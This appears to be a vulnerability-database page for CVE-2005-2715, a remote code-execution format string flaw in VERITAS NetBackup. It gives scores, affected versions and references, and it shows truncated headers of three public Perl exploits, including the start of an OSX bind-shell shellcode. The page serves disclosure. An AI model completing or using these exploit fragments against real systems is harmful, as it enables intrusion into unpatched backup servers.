Published: 12/10/2005 Updated: 05/09/2008

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Subscribe to Netbackup Data And Business Center

Format string vulnerability in the Java user interface service (bpjava-msvc) daemon for VERITAS NetBackup Data and Business Center 4.5FP and 4.5MP, and NetBackup Enterprise/Server/Client 5.0, 5.1, and 6.0, allows remote malicious users to execute arbitrary code via the COMMAND_LOGON_TO_MSERVER command.

Vulnerable Product	Search on Vulmon	Subscribe to Product
symantec veritas netbackup data and business center 4.5fp
symantec veritas netbackup data and business center 4.5mp
symantec veritas netbackup enterprise server client 5.0
symantec veritas netbackup enterprise server client 5.1
symantec veritas netbackup enterprise server client 6.0

#!/usr/bin/perl ############################################################## # VERITAS-Linuxpl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit # johnh[at]digitalmunition[dot]com # bug found by kf_lists[at]digitalmunition[dot]com # wwwdigitalmunitioncom/ ############################################################## use POSI ...

#!/usr/bin/perl # VERITAS-OSXpl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit # johnh[at]digitalmunition[dot]com # bug found by kf_lists[at]digitalmunition[dot]com # wwwdigitalmunitioncom/ use POSIX; use IO::Socket; use IO::Select; my $shellcode = # /* OSX BINDSHELLCODE PORT=5557 NO-0x0 */ "\x60\x60\x60\x60" x 10 "\x7c\ ...

#!C:\Perl\bin\perlexe -w # # Vertias Netbackup Win32 format string exploit # Code By: johnh[at]digitalmunition[dot]com & kf[at]digitalmunition[dot]com # # For win2k/xp pre sp2 we overwrote PEBFastlock -> rtlentercritical # For win xp sp2 we overwrote SEH # wwwdigitalmunitioncom/ # # You may have to run this 2 times use IO::Socke ...

NVD-CWE-Other http://www.zerodayinitiative.com/advisories/ZDI-05-001.html http://www.symantec.com/avcenter/security/Content/2005.10.12.html http://www.kb.cert.org/vuls/id/495556 http://securitytracker.com/id?1015028 http://www.securityfocus.com/bid/15079 http://secunia.com/advisories/17181 http://seer.support.veritas.com/docs/279085.htm http://sunsolve.sun.com/search/document.do?assetkey=1-26-102054-1 https://nvd.nist.gov https://www.exploit-db.com/exploits/1263/

CVE-2005-2715

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect